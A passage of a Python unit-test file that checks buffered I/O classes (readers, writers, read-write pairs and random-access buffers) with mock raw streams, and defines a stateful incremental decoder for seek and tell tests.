bufsize2 = 8192
rawio = self.MockRawIO()
bufio = self.tp(rawio, buffer_size=bufsize1)
size = sys.getsizeof(bufio) - bufsize1
rawio = self.MockRawIO()
bufio = self.tp(rawio, buffer_size=bufsize2)
self.assertEqual(sys.getsizeof(bufio), size + bufsize2)
class BufferedReaderTest(unittest.TestCase, CommonBufferedTests):
read_mode = "rb"
def test_constructor(self):
rawio = self.MockRawIO([b"abc"])
bufio = self.tp(rawio)
bufio.__init__(rawio)
bufio.__init__(rawio, buffer_size=1024)
bufio.__init__(rawio, buffer_size=16)
self.assertEqual(b"abc", bufio.read())
self.assertRaises(ValueError, bufio.__init__, rawio, buffer_size=0)
self.assertRaises(ValueError, bufio.__init__, rawio, buffer_size=-16)
self.assertRaises(ValueError, bufio.__init__, rawio, buffer_size=-1)
rawio = self.MockRawIO([b"abc"])
bufio.__init__(rawio)
self.assertEqual(b"abc", bufio.read())
def test_read(self):
for arg in (None, 7):
rawio = self.MockRawIO((b"abc", b"d", b"efg"))
bufio = self.tp(rawio)
self.assertEqual(b"abcdefg", bufio.read(arg))
# Invalid args
self.assertRaises(ValueError, bufio.read, -2)
def test_read1(self):
rawio = self.MockRawIO((b"abc", b"d", b"efg"))
bufio = self.tp(rawio)
self.assertEqual(b"a", bufio.read(1))
self.assertEqual(b"b", bufio.read1(1))
self.assertEqual(rawio._reads, 1)
self.assertEqual(b"c", bufio.read1(100))
self.assertEqual(rawio._reads, 1)
self.assertEqual(b"d", bufio.read1(100))
self.assertEqual(rawio._reads, 2)
self.assertEqual(b"efg", bufio.read1(100))
self.assertEqual(rawio._reads, 3)
self.assertEqual(b"", bufio.read1(100))
self.assertEqual(rawio._reads, 4)
# Invalid args
self.assertRaises(ValueError, bufio.read1, -1)
def test_readinto(self):
rawio = self.MockRawIO((b"abc", b"d", b"efg"))
bufio = self.tp(rawio)
b = bytearray(2)
self.assertEqual(bufio.readinto(b), 2)
self.assertEqual(b, b"ab")
self.assertEqual(bufio.readinto(b), 2)
self.assertEqual(b, b"cd")
self.assertEqual(bufio.readinto(b), 2)
self.assertEqual(b, b"ef")
self.assertEqual(bufio.readinto(b), 1)
self.assertEqual(b, b"gf")
self.assertEqual(bufio.readinto(b), 0)
self.assertEqual(b, b"gf")
def test_readlines(self):
def bufio():
rawio = self.MockRawIO((b"abc\n", b"d\n", b"ef"))
return self.tp(rawio)
self.assertEqual(bufio().readlines(), [b"abc\n", b"d\n", b"ef"])
self.assertEqual(bufio().readlines(5), [b"abc\n", b"d\n"])
self.assertEqual(bufio().readlines(None), [b"abc\n", b"d\n", b"ef"])
def test_buffering(self):
data = b"abcdefghi"
dlen = len(data)
tests = [
[ 100, [ 3, 1, 4, 8 ], [ dlen, 0 ] ],
[ 100, [ 3, 3, 3], [ dlen ] ],
[ 4, [ 1, 2, 4, 2 ], [ 4, 4, 1 ] ],
]
for bufsize, buf_read_sizes, raw_read_sizes in tests:
rawio = self.MockFileIO(data)
bufio = self.tp(rawio, buffer_size=bufsize)
pos = 0
for nbytes in buf_read_sizes:
self.assertEqual(bufio.read(nbytes), data[pos:pos+nbytes])
pos += nbytes
# this is mildly implementation-dependent
self.assertEqual(rawio.read_history, raw_read_sizes)
def test_read_non_blocking(self):
# Inject some None's in there to simulate EWOULDBLOCK
rawio = self.MockRawIO((b"abc", b"d", None, b"efg", None, None, None))
bufio = self.tp(rawio)
self.assertEqual(b"abcd", bufio.read(6))
self.assertEqual(b"e", bufio.read(1))
self.assertEqual(b"fg", bufio.read())
self.assertEqual(b"", bufio.peek(1))
self.assertIsNone(bufio.read())
self.assertEqual(b"", bufio.read())
rawio = self.MockRawIO((b"a", None, None))
self.assertEqual(b"a", rawio.readall())
self.assertIsNone(rawio.readall())
def test_read_past_eof(self):
rawio = self.MockRawIO((b"abc", b"d", b"efg"))
bufio = self.tp(rawio)
self.assertEqual(b"abcdefg", bufio.read(9000))
def test_read_all(self):
rawio = self.MockRawIO((b"abc", b"d", b"efg"))
bufio = self.tp(rawio)
self.assertEqual(b"abcdefg", bufio.read())
@unittest.skipUnless(threading, 'Threading required for this test.')
@support.requires_resource('cpu')
def test_threads(self):
try:
# Write out many bytes with exactly the same number of 0's,
# 1's... 255's. This will help us check that concurrent reading
# doesn't duplicate or forget contents.
N = 1000
l = list(range(256)) * N
random.shuffle(l)
s = bytes(bytearray(l))
with self.open(support.TESTFN, "wb") as f:
f.write(s)
with self.open(support.TESTFN, self.read_mode, buffering=0) as raw:
bufio = self.tp(raw, 8)
errors = []
results = []
def f():
try:
# Intra-buffer read then buffer-flushing read
for n in cycle([1, 19]):
s = bufio.read(n)
if not s:
break
# list.append() is atomic
results.append(s)
except Exception as e:
errors.append(e)
raise
threads = [threading.Thread(target=f) for x in range(20)]
for t in threads:
t.start()
time.sleep(0.02) # yield
for t in threads:
t.join()
self.assertFalse(errors,
"the following exceptions were caught: %r" % errors)
s = b''.join(results)
for i in range(256):
c = bytes(bytearray([i]))
self.assertEqual(s.count(c), N)
finally:
support.unlink(support.TESTFN)
def test_misbehaved_io(self):
rawio = self.MisbehavedRawIO((b"abc", b"d", b"efg"))
bufio = self.tp(rawio)
self.assertRaises(IOError, bufio.seek, 0)
self.assertRaises(IOError, bufio.tell)
def test_no_extraneous_read(self):
# Issue #9550; when the raw IO object has satisfied the read request,
# we should not issue any additional reads, otherwise it may block
# (e.g. socket).
bufsize = 16
for n in (2, bufsize - 1, bufsize, bufsize + 1, bufsize * 2):
rawio = self.MockRawIO([b"x" * n])
bufio = self.tp(rawio, bufsize)
self.assertEqual(bufio.read(n), b"x" * n)
# Simple case: one raw read is enough to satisfy the request.
self.assertEqual(rawio._extraneous_reads, 0,
"failed for {}: {} != 0".format(n, rawio._extraneous_reads))
# A more complex case where two raw reads are needed to satisfy
# the request.
rawio = self.MockRawIO([b"x" * (n - 1), b"x"])
bufio = self.tp(rawio, bufsize)
self.assertEqual(bufio.read(n), b"x" * n)
self.assertEqual(rawio._extraneous_reads, 0,
"failed for {}: {} != 0".format(n, rawio._extraneous_reads))
class CBufferedReaderTest(BufferedReaderTest, SizeofTest):
tp = io.BufferedReader
def test_constructor(self):
BufferedReaderTest.test_constructor(self)
# The allocation can succeed on 32-bit builds, e.g. with more
# than 2GB RAM and a 64-bit kernel.
if sys.maxsize > 0x7FFFFFFF:
rawio = self.MockRawIO()
bufio = self.tp(rawio)
self.assertRaises((OverflowError, MemoryError, ValueError),
bufio.__init__, rawio, sys.maxsize)
def test_initialization(self):
rawio = self.MockRawIO([b"abc"])
bufio = self.tp(rawio)
self.assertRaises(ValueError, bufio.__init__, rawio, buffer_size=0)
self.assertRaises(ValueError, bufio.read)
self.assertRaises(ValueError, bufio.__init__, rawio, buffer_size=-16)
self.assertRaises(ValueError, bufio.read)
self.assertRaises(ValueError, bufio.__init__, rawio, buffer_size=-1)
self.assertRaises(ValueError, bufio.read)
@support.cpython_only
def test_misbehaved_io_read(self):
rawio = self.MisbehavedRawIO((b"abc", b"d", b"efg"))
bufio = self.tp(rawio)
# _pyio.BufferedReader seems to implement reading different, so that
# checking this is not so easy.
# Jython adds: not raised in _jyio.py stand-in. Maybe in eventual Java version.
# CPython raises "raw readinto() returned invalid length" here:
# http://hg.python.org/cpython/file/8527427914a2/Modules/_io/bufferedio.c#l1298
self.assertRaises(IOError, bufio.read, 10)
@unittest.skipIf(support.is_jython, "GC nondeterministic in Jython")
def test_garbage_collection(self):
# C BufferedReader objects are collected.
# The Python version has __del__, so it ends into gc.garbage instead
rawio = self.FileIO(support.TESTFN, "w+b")
f = self.tp(rawio)
f.f = f
wr = weakref.ref(f)
del f
support.gc_collect()
self.assertTrue(wr() is None, wr)
@unittest.skipIf(support.is_jython, "FIXME: in the Java version with ArgParser")
# When implemented in Python, the error message is about __init__, even on CPython
def test_args_error(self):
# Issue #17275
with self.assertRaisesRegexp(TypeError, "BufferedReader"):
self.tp(io.BytesIO(), 1024, 1024, 1024)
class PyBufferedReaderTest(BufferedReaderTest):
tp = pyio.BufferedReader
class BufferedWriterTest(unittest.TestCase, CommonBufferedTests):
write_mode = "wb"
def test_constructor(self):
rawio = self.MockRawIO()
bufio = self.tp(rawio)
bufio.__init__(rawio)
bufio.__init__(rawio, buffer_size=1024)
bufio.__init__(rawio, buffer_size=16)
self.assertEqual(3, bufio.write(b"abc"))
bufio.flush()
self.assertRaises(ValueError, bufio.__init__, rawio, buffer_size=0)
self.assertRaises(ValueError, bufio.__init__, rawio, buffer_size=-16)
self.assertRaises(ValueError, bufio.__init__, rawio, buffer_size=-1)
bufio.__init__(rawio)
self.assertEqual(3, bufio.write(b"ghi"))
bufio.flush()
self.assertEqual(b"".join(rawio._write_stack), b"abcghi")
def test_detach_flush(self):
raw = self.MockRawIO()
buf = self.tp(raw)
buf.write(b"howdy!")
self.assertFalse(raw._write_stack)
buf.detach()
self.assertEqual(raw._write_stack, [b"howdy!"])
def test_write(self):
# Write to the buffered IO but don't overflow the buffer.
writer = self.MockRawIO()
bufio = self.tp(writer, 8)
bufio.write(b"abc")
self.assertFalse(writer._write_stack)
def test_write_overflow(self):
writer = self.MockRawIO()
bufio = self.tp(writer, 8)
contents = b"abcdefghijklmnop"
for n in range(0, len(contents), 3):
bufio.write(contents[n:n+3])
flushed = b"".join(writer._write_stack)
# At least (total - 8) bytes were implicitly flushed, perhaps more
# depending on the implementation.
self.assertTrue(flushed.startswith(contents[:-8]), flushed)
def check_writes(self, intermediate_func):
# Lots of writes, test the flushed output is as expected.
contents = bytes(range(256)) * 1000
n = 0
writer = self.MockRawIO()
bufio = self.tp(writer, 13)
# Generator of write sizes: repeat each N 15 times then proceed to N+1
def gen_sizes():
for size in count(1):
for i in range(15):
yield size
sizes = gen_sizes()
while n < len(contents):
size = min(next(sizes), len(contents) - n)
self.assertEqual(bufio.write(contents[n:n+size]), size)
intermediate_func(bufio)
n += size
bufio.flush()
self.assertEqual(contents,
b"".join(writer._write_stack))
def test_writes(self):
self.check_writes(lambda bufio: None)
def test_writes_and_flushes(self):
self.check_writes(lambda bufio: bufio.flush())
def test_writes_and_seeks(self):
def _seekabs(bufio):
pos = bufio.tell()
bufio.seek(pos + 1, 0)
bufio.seek(pos - 1, 0)
bufio.seek(pos, 0)
self.check_writes(_seekabs)
def _seekrel(bufio):
pos = bufio.seek(0, 1)
bufio.seek(+1, 1)
bufio.seek(-1, 1)
bufio.seek(pos, 0)
self.check_writes(_seekrel)
def test_writes_and_truncates(self):
self.check_writes(lambda bufio: bufio.truncate(bufio.tell()))
def test_write_non_blocking(self):
raw = self.MockNonBlockWriterIO()
bufio = self.tp(raw, 8)
self.assertEqual(bufio.write(b"abcd"), 4)
self.assertEqual(bufio.write(b"efghi"), 5)
# 1 byte will be written, the rest will be buffered
raw.block_on(b"k")
self.assertEqual(bufio.write(b"jklmn"), 5)
# 8 bytes will be written, 8 will be buffered and the rest will be lost
raw.block_on(b"0")
try:
bufio.write(b"opqrwxyz0123456789")
except self.BlockingIOError as e:
written = e.characters_written
else:
self.fail("BlockingIOError should have been raised")
self.assertEqual(written, 16)
self.assertEqual(raw.pop_written(),
b"abcdefghijklmnopqrwxyz")
self.assertEqual(bufio.write(b"ABCDEFGHI"), 9)
s = raw.pop_written()
# Previously buffered bytes were flushed
self.assertTrue(s.startswith(b"01234567A"), s)
def test_write_and_rewind(self):
raw = io.BytesIO()
bufio = self.tp(raw, 4)
self.assertEqual(bufio.write(b"abcdef"), 6)
self.assertEqual(bufio.tell(), 6)
bufio.seek(0, 0)
self.assertEqual(bufio.write(b"XY"), 2)
bufio.seek(6, 0)
self.assertEqual(raw.getvalue(), b"XYcdef")
self.assertEqual(bufio.write(b"123456"), 6)
bufio.flush()
self.assertEqual(raw.getvalue(), b"XYcdef123456")
def test_flush(self):
writer = self.MockRawIO()
bufio = self.tp(writer, 8)
bufio.write(b"abc")
bufio.flush()
self.assertEqual(b"abc", writer._write_stack[0])
def test_writelines(self):
l = [b'ab', b'cd', b'ef']
writer = self.MockRawIO()
bufio = self.tp(writer, 8)
bufio.writelines(l)
bufio.flush()
self.assertEqual(b''.join(writer._write_stack), b'abcdef')
def test_writelines_userlist(self):
l = UserList([b'ab', b'cd', b'ef'])
writer = self.MockRawIO()
bufio = self.tp(writer, 8)
bufio.writelines(l)
bufio.flush()
self.assertEqual(b''.join(writer._write_stack), b'abcdef')
def test_writelines_error(self):
writer = self.MockRawIO()
bufio = self.tp(writer, 8)
self.assertRaises(TypeError, bufio.writelines, [1, 2, 3])
self.assertRaises(TypeError, bufio.writelines, None)
@unittest.skipIf(support.is_jython, "GC nondeterministic in Jython")
def test_destructor(self):
writer = self.MockRawIO()
bufio = self.tp(writer, 8)
bufio.write(b"abc")
del bufio
support.gc_collect()
self.assertEqual(b"abc", writer._write_stack[0])
def test_truncate(self):
# Truncate implicitly flushes the buffer.
with self.open(support.TESTFN, self.write_mode, buffering=0) as raw:
bufio = self.tp(raw, 8)
bufio.write(b"abcdef")
self.assertEqual(bufio.truncate(3), 3)
self.assertEqual(bufio.tell(), 6)
with self.open(support.TESTFN, "rb", buffering=0) as f:
self.assertEqual(f.read(), b"abc")
@unittest.skipUnless(threading, 'Threading required for this test.')
@support.requires_resource('cpu')
def test_threads(self):
try:
# Write out many bytes from many threads and test they were
# all flushed.
N = 1000
contents = bytes(range(256)) * N
sizes = cycle([1, 19])
n = 0
queue = deque()
while n < len(contents):
size = next(sizes)
queue.append(contents[n:n+size])
n += size
del contents
# We use a real file object because it allows us to
# exercise situations where the GIL is released before
# writing the buffer to the raw streams. This is in addition
# to concurrency issues due to switching threads in the middle
# of Python code.
with self.open(support.TESTFN, self.write_mode, buffering=0) as raw:
bufio = self.tp(raw, 8)
errors = []
def f():
try:
while True:
try:
s = queue.popleft()
except IndexError:
return
bufio.write(s)
except Exception as e:
errors.append(e)
raise
threads = [threading.Thread(target=f) for x in range(20)]
for t in threads:
t.start()
time.sleep(0.02) # yield
for t in threads:
t.join()
self.assertFalse(errors,
"the following exceptions were caught: %r" % errors)
bufio.close()
with self.open(support.TESTFN, "rb") as f:
s = f.read()
for i in range(256):
self.assertEqual(s.count(bytes([i])), N)
finally:
support.unlink(support.TESTFN)
def test_misbehaved_io(self):
rawio = self.MisbehavedRawIO()
bufio = self.tp(rawio, 5)
self.assertRaises(IOError, bufio.seek, 0)
self.assertRaises(IOError, bufio.tell)
self.assertRaises(IOError, bufio.write, b"abcdef")
def test_max_buffer_size_deprecation(self):
with support.check_warnings(("max_buffer_size is deprecated",
DeprecationWarning)):
self.tp(self.MockRawIO(), 8, 12)
def test_write_error_on_close(self):
raw = self.MockRawIO()
def bad_write(b):
raise IOError()
raw.write = bad_write
b = self.tp(raw)
b.write(b'spam')
self.assertRaises(IOError, b.close) # exception not swallowed
self.assertTrue(b.closed)
class CBufferedWriterTest(BufferedWriterTest, SizeofTest):
tp = io.BufferedWriter
def test_constructor(self):
BufferedWriterTest.test_constructor(self)
# The allocation can succeed on 32-bit builds, e.g. with more
# than 2GB RAM and a 64-bit kernel.
if sys.maxsize > 0x7FFFFFFF:
rawio = self.MockRawIO()
bufio = self.tp(rawio)
self.assertRaises((OverflowError, MemoryError, ValueError),
bufio.__init__, rawio, sys.maxsize)
def test_initialization(self):
rawio = self.MockRawIO()
bufio = self.tp(rawio)
self.assertRaises(ValueError, bufio.__init__, rawio, buffer_size=0)
self.assertRaises(ValueError, bufio.write, b"def")
self.assertRaises(ValueError, bufio.__init__, rawio, buffer_size=-16)
self.assertRaises(ValueError, bufio.write, b"def")
self.assertRaises(ValueError, bufio.__init__, rawio, buffer_size=-1)
self.assertRaises(ValueError, bufio.write, b"def")
@unittest.skipIf(support.is_jython, "GC nondeterministic in Jython")
def test_garbage_collection(self):
# C BufferedWriter objects are collected, and collecting them flushes
# all data to disk.
# The Python version has __del__, so it ends into gc.garbage instead
rawio = self.FileIO(support.TESTFN, "w+b")
f = self.tp(rawio)
f.write(b"123xxx")
f.x = f
wr = weakref.ref(f)
del f
support.gc_collect()
self.assertTrue(wr() is None, wr)
with self.open(support.TESTFN, "rb") as f:
self.assertEqual(f.read(), b"123xxx")
@unittest.skipIf(support.is_jython, "FIXME: in the Java version with ArgParser")
# When implemented in Python, the error message is about __init__, even on CPython
def test_args_error(self):
# Issue #17275
with self.assertRaisesRegexp(TypeError, "BufferedWriter"):
self.tp(io.BytesIO(), 1024, 1024, 1024)
class PyBufferedWriterTest(BufferedWriterTest):
tp = pyio.BufferedWriter
class BufferedRWPairTest(unittest.TestCase):
def test_constructor(self):
pair = self.tp(self.MockRawIO(), self.MockRawIO())
self.assertFalse(pair.closed)
def test_detach(self):
pair = self.tp(self.MockRawIO(), self.MockRawIO())
self.assertRaises(self.UnsupportedOperation, pair.detach)
def test_constructor_max_buffer_size_deprecation(self):
with support.check_warnings(("max_buffer_size is deprecated",
DeprecationWarning)):
self.tp(self.MockRawIO(), self.MockRawIO(), 8, 12)
def test_constructor_with_not_readable(self):
class NotReadable(MockRawIO):
def readable(self):
return False
self.assertRaises(IOError, self.tp, NotReadable(), self.MockRawIO())
def test_constructor_with_not_writeable(self):
class NotWriteable(MockRawIO):
def writable(self):
return False
self.assertRaises(IOError, self.tp, self.MockRawIO(), NotWriteable())
def test_read(self):
pair = self.tp(self.BytesIO(b"abcdef"), self.MockRawIO())
self.assertEqual(pair.read(3), b"abc")
self.assertEqual(pair.read(1), b"d")
self.assertEqual(pair.read(), b"ef")
pair = self.tp(self.BytesIO(b"abc"), self.MockRawIO())
self.assertEqual(pair.read(None), b"abc")
def test_readlines(self):
pair = lambda: self.tp(self.BytesIO(b"abc\ndef\nh"), self.MockRawIO())
self.assertEqual(pair().readlines(), [b"abc\n", b"def\n", b"h"])
self.assertEqual(pair().readlines(), [b"abc\n", b"def\n", b"h"])
self.assertEqual(pair().readlines(5), [b"abc\n", b"def\n"])
def test_read1(self):
# .read1() is delegated to the underlying reader object, so this test
# can be shallow.
pair = self.tp(self.BytesIO(b"abcdef"), self.MockRawIO())
self.assertEqual(pair.read1(3), b"abc")
def test_readinto(self):
pair = self.tp(self.BytesIO(b"abcdef"), self.MockRawIO())
data = bytearray(5)
self.assertEqual(pair.readinto(data), 5)
self.assertEqual(data, b"abcde")
def test_write(self):
w = self.MockRawIO()
pair = self.tp(self.MockRawIO(), w)
pair.write(b"abc")
pair.flush()
pair.write(b"def")
pair.flush()
self.assertEqual(w._write_stack, [b"abc", b"def"])
def test_peek(self):
pair = self.tp(self.BytesIO(b"abcdef"), self.MockRawIO())
self.assertTrue(pair.peek(3).startswith(b"abc"))
self.assertEqual(pair.read(3), b"abc")
def test_readable(self):
pair = self.tp(self.MockRawIO(), self.MockRawIO())
self.assertTrue(pair.readable())
def test_writeable(self):
pair = self.tp(self.MockRawIO(), self.MockRawIO())
self.assertTrue(pair.writable())
def test_seekable(self):
# BufferedRWPairs are never seekable, even if their readers and writers
# are.
pair = self.tp(self.MockRawIO(), self.MockRawIO())
self.assertFalse(pair.seekable())
# .flush() is delegated to the underlying writer object and has been
# tested in the test_write method.
def test_close_and_closed(self):
pair = self.tp(self.MockRawIO(), self.MockRawIO())
self.assertFalse(pair.closed)
pair.close()
self.assertTrue(pair.closed)
def test_isatty(self):
class SelectableIsAtty(MockRawIO):
def __init__(self, isatty):
MockRawIO.__init__(self)
self._isatty = isatty
def isatty(self):
return self._isatty
pair = self.tp(SelectableIsAtty(False), SelectableIsAtty(False))
self.assertFalse(pair.isatty())
pair = self.tp(SelectableIsAtty(True), SelectableIsAtty(False))
self.assertTrue(pair.isatty())
pair = self.tp(SelectableIsAtty(False), SelectableIsAtty(True))
self.assertTrue(pair.isatty())
pair = self.tp(SelectableIsAtty(True), SelectableIsAtty(True))
self.assertTrue(pair.isatty())
class CBufferedRWPairTest(BufferedRWPairTest):
tp = io.BufferedRWPair
class PyBufferedRWPairTest(BufferedRWPairTest):
tp = pyio.BufferedRWPair
class BufferedRandomTest(BufferedReaderTest, BufferedWriterTest):
read_mode = "rb+"
write_mode = "wb+"
def test_constructor(self):
BufferedReaderTest.test_constructor(self)
BufferedWriterTest.test_constructor(self)
def test_read_and_write(self):
raw = self.MockRawIO((b"asdf", b"ghjk"))
rw = self.tp(raw, 8)
self.assertEqual(b"as", rw.read(2))
rw.write(b"ddd")
rw.write(b"eee")
self.assertFalse(raw._write_stack) # Buffer writes
self.assertEqual(b"ghjk", rw.read())
self.assertEqual(b"dddeee", raw._write_stack[0])
def test_seek_and_tell(self):
raw = self.BytesIO(b"asdfghjkl")
rw = self.tp(raw)
self.assertEqual(b"as", rw.read(2))
self.assertEqual(2, rw.tell())
rw.seek(0, 0)
self.assertEqual(b"asdf", rw.read(4))
rw.write(b"123f")
rw.seek(0, 0)
self.assertEqual(b"asdf123fl", rw.read())
self.assertEqual(9, rw.tell())
rw.seek(-4, 2)
self.assertEqual(5, rw.tell())
rw.seek(2, 1)
self.assertEqual(7, rw.tell())
self.assertEqual(b"fl", rw.read(11))
rw.flush()
self.assertEqual(b"asdf123fl", raw.getvalue())
self.assertRaises(TypeError, rw.seek, 0.0)
def check_flush_and_read(self, read_func):
raw = self.BytesIO(b"abcdefghi")
bufio = self.tp(raw)
self.assertEqual(b"ab", read_func(bufio, 2))
bufio.write(b"12")
self.assertEqual(b"ef", read_func(bufio, 2))
self.assertEqual(6, bufio.tell())
bufio.flush()
self.assertEqual(6, bufio.tell())
self.assertEqual(b"ghi", read_func(bufio))
raw.seek(0, 0)
raw.write(b"XYZ")
# flush() resets the read buffer
bufio.flush()
bufio.seek(0, 0)
self.assertEqual(b"XYZ", read_func(bufio, 3))
def test_flush_and_read(self):
self.check_flush_and_read(lambda bufio, *args: bufio.read(*args))
def test_flush_and_readinto(self):
def _readinto(bufio, n=-1):
b = bytearray(n if n >= 0 else 9999)
n = bufio.readinto(b)
return bytes(b[:n])
self.check_flush_and_read(_readinto)
def test_flush_and_peek(self):
def _peek(bufio, n=-1):
# This relies on the fact that the buffer can contain the whole
# raw stream, otherwise peek() can return less.
b = bufio.peek(n)
if n != -1:
b = b[:n]
bufio.seek(len(b), 1)
return b
self.check_flush_and_read(_peek)
def test_flush_and_write(self):
raw = self.BytesIO(b"abcdefghi")
bufio = self.tp(raw)
bufio.write(b"123")
bufio.flush()
bufio.write(b"45")
bufio.flush()
bufio.seek(0, 0)
self.assertEqual(b"12345fghi", raw.getvalue())
self.assertEqual(b"12345fghi", bufio.read())
def test_threads(self):
BufferedReaderTest.test_threads(self)
BufferedWriterTest.test_threads(self)
def test_writes_and_peek(self):
def _peek(bufio):
bufio.peek(1)
self.check_writes(_peek)
def _peek(bufio):
pos = bufio.tell()
bufio.seek(-1, 1)
bufio.peek(1)
bufio.seek(pos, 0)
self.check_writes(_peek)
def test_writes_and_reads(self):
def _read(bufio):
bufio.seek(-1, 1)
bufio.read(1)
self.check_writes(_read)
def test_writes_and_read1s(self):
def _read1(bufio):
bufio.seek(-1, 1)
bufio.read1(1)
self.check_writes(_read1)
def test_writes_and_readintos(self):
def _read(bufio):
bufio.seek(-1, 1)
bufio.readinto(bytearray(1))
self.check_writes(_read)
def test_write_after_readahead(self):
# Issue #6629: writing after the buffer was filled by readahead should
# first rewind the raw stream.
for overwrite_size in [1, 5]:
raw = self.BytesIO(b"A" * 10)
bufio = self.tp(raw, 4)
# Trigger readahead
self.assertEqual(bufio.read(1), b"A")
self.assertEqual(bufio.tell(), 1)
# Overwriting should rewind the raw stream if it needs so
bufio.write(b"B" * overwrite_size)
self.assertEqual(bufio.tell(), overwrite_size + 1)
# If the write size was smaller than the buffer size, flush() and
# check that rewind happens.
bufio.flush()
self.assertEqual(bufio.tell(), overwrite_size + 1)
s = raw.getvalue()
self.assertEqual(s,
b"A" + b"B" * overwrite_size + b"A" * (9 - overwrite_size))
def test_write_rewind_write(self):
# Various combinations of reading / writing / seeking backwards / writing again
def mutate(bufio, pos1, pos2):
assert pos2 >= pos1
# Fill the buffer
bufio.seek(pos1)
bufio.read(pos2 - pos1)
bufio.write(b'\x02')
# This writes earlier than the previous write, but still inside
# the buffer.
bufio.seek(pos1)
bufio.write(b'\x01')
b = b"\x80\x81\x82\x83\x84"
for i in range(0, len(b)):
for j in range(i, len(b)):
raw = self.BytesIO(b)
bufio = self.tp(raw, 100)
mutate(bufio, i, j)
bufio.flush()
expected = bytearray(b)
expected[j] = 2
expected[i] = 1
self.assertEqual(raw.getvalue(), expected,
"failed result for i=%d, j=%d" % (i, j))
def test_truncate_after_read_or_write(self):
raw = self.BytesIO(b"A" * 10)
bufio = self.tp(raw, 100)
self.assertEqual(bufio.read(2), b"AA") # the read buffer gets filled
self.assertEqual(bufio.truncate(), 2)
self.assertEqual(bufio.write(b"BB"), 2) # the write buffer increases
self.assertEqual(bufio.truncate(), 4)
def test_misbehaved_io(self):
BufferedReaderTest.test_misbehaved_io(self)
BufferedWriterTest.test_misbehaved_io(self)
def test_interleaved_read_write(self):
# Test for issue #12213
with self.BytesIO(b'abcdefgh') as raw:
with self.tp(raw, 100) as f:
f.write(b"1")
self.assertEqual(f.read(1), b'b')
f.write(b'2')
self.assertEqual(f.read1(1), b'd')
f.write(b'3')
buf = bytearray(1)
f.readinto(buf)
self.assertEqual(buf, b'f')
f.write(b'4')
self.assertEqual(f.peek(1), b'h')
f.flush()
self.assertEqual(raw.getvalue(), b'1b2d3f4h')
with self.BytesIO(b'abc') as raw:
with self.tp(raw, 100) as f:
self.assertEqual(f.read(1), b'a')
f.write(b"2")
self.assertEqual(f.read(1), b'c')
f.flush()
self.assertEqual(raw.getvalue(), b'a2c')
def test_interleaved_readline_write(self):
with self.BytesIO(b'ab\ncdef\ng\n') as raw:
with self.tp(raw) as f:
f.write(b'1')
self.assertEqual(f.readline(), b'b\n')
f.write(b'2')
self.assertEqual(f.readline(), b'def\n')
f.write(b'3')
self.assertEqual(f.readline(), b'\n')
f.flush()
self.assertEqual(raw.getvalue(), b'1b\n2def\n3\n')
class CBufferedRandomTest(CBufferedReaderTest, CBufferedWriterTest,
BufferedRandomTest, SizeofTest):
tp = io.BufferedRandom
def test_constructor(self):
BufferedRandomTest.test_constructor(self)
# The allocation can succeed on 32-bit builds, e.g. with more
# than 2GB RAM and a 64-bit kernel.
if sys.maxsize > 0x7FFFFFFF:
rawio = self.MockRawIO()
bufio = self.tp(rawio)
self.assertRaises((OverflowError, MemoryError, ValueError),
bufio.__init__, rawio, sys.maxsize)
def test_garbage_collection(self):
CBufferedReaderTest.test_garbage_collection(self)
CBufferedWriterTest.test_garbage_collection(self)
@unittest.skipIf(support.is_jython, "FIXME: in the Java version with ArgParser")
# When implemented in Python, the error message is about __init__, even on CPython
def test_args_error(self):
# Issue #17275
with self.assertRaisesRegexp(TypeError, "BufferedRandom"):
self.tp(io.BytesIO(), 1024, 1024, 1024)
class PyBufferedRandomTest(BufferedRandomTest):
tp = pyio.BufferedRandom
# To fully exercise seek/tell, the StatefulIncrementalDecoder has these
# properties:
# - A single output character can correspond to many bytes of input.
# - The number of input bytes to complete the character can be
# undetermined until the last input byte is received.
# - The number of input bytes can vary depending on previous input.
# - A single input byte can correspond to many characters of output.
# - The number of output characters can be undetermined until the
# last input byte is received.
# - The number of output characters can vary depending on previous input.
class StatefulIncrementalDecoder(codecs.IncrementalDecoder):
"""
For testing seek/tell behavior with a stateful, buffering decoder.
Input is a sequence of words. Words may be fixed-length (length set
by input) or variable-length (period-terminated). In variable-length
mode, extra periods are ignored. Possible words are:
- 'i' followed by a number sets the input length, I (maximum 99).
When I is set to 0, words are space-terminated.
- 'o' followed by a number sets the output length, O (maximum 99).
- Any other word is converted into a word followed by a period on
the output. The output word consists of the input word truncated
or padded out with hyphens to make its length equal to O. If O
is 0, the word is output verbatim without truncating or padding.
I and O are initially set to 1. When I changes, any buffered input is
re-scanned according to the new I. EOF also terminates the last word.
"""
def __init__(self, errors='strict'):
codecs.IncrementalDecoder.__init__(self, errors)
self.reset()
def __repr__(self):
return '<SID %x>' % id(self)
def reset(self):
self.i = 1
self.o = 1
self.buffer = bytearray()
def getstate(self):
i, o = self.i ^ 1, self.o ^ 1 # so that flags = 0 after reset()
return bytes(self.buffer), i*100 + o
def setstate(self, state):
buffer, io = state
self.buffer = bytearray(buffer)
i, o = divmod(io, 100)
self.i, self.o = i ^ 1, o ^ 1
def decode(self, input, final=False):
output = ''
for b in input:
if self.i == 0: # variable-length, terminated with period
if b == '.':
if self.buffer:
output += self.process_word()
else:
self.buffer.append(b)
else: # fixed-length, terminate after self.i bytes
self.buffer.append(b)
if len(self.buffer) == self.i:
output += self.process_word()
if final and self.buffer: # EOF terminates the last word
output += self.process_word()
return output
def process_word(self):
output = ''
if self.buffer[0] == ord('i'):
self.i = min(99, int(self.buffer[1:] or 0)) # set input length
elif self.buffer[0] == ord('o'):
self.o = min(99, int(self.buffer[1:] or 0)) # set output length
else:
output = self.buffer.decode('ascii')
if len(output) < self.o:
output += '-'*self.o # pad out with hyphens
if self.o:
output = output[:self.o] # truncate to output length
output += '.'
self.buffer = bytearray()
return output
codecEnabled = False
@classmethod
def lookupTestDecoder(cls, name):
if cls.codecEnabled and name == 'test_decoder':
latin1 = codecs.lookup('latin-1')
return codecs.CodecInfo(
name='test_decoder', encode=latin1.encode, decode=None,
incrementalencoder=None,
streamreader=None, streamwriter=None,
incrementaldecoder=cls)
# Register the previous decoder for testing.
# Disabled by default, tests will enable it.
codecs.register(StatefulIncrementalDecoder.lookupTestDecoder)
class StatefulIncrementalDecoderTest(unittest.TestCase):
"""
Make sure the StatefulIncrementalDecoder actually works.
"""
test_cases = [
# I=1, O=1 (fixed-length input == fixed-length output)
(b'abcd', False, 'a.b.c.d.'),
# I=0, O=0 (variable-length input, variable-length output)
(b'oiabcd', True, 'abcd.'),
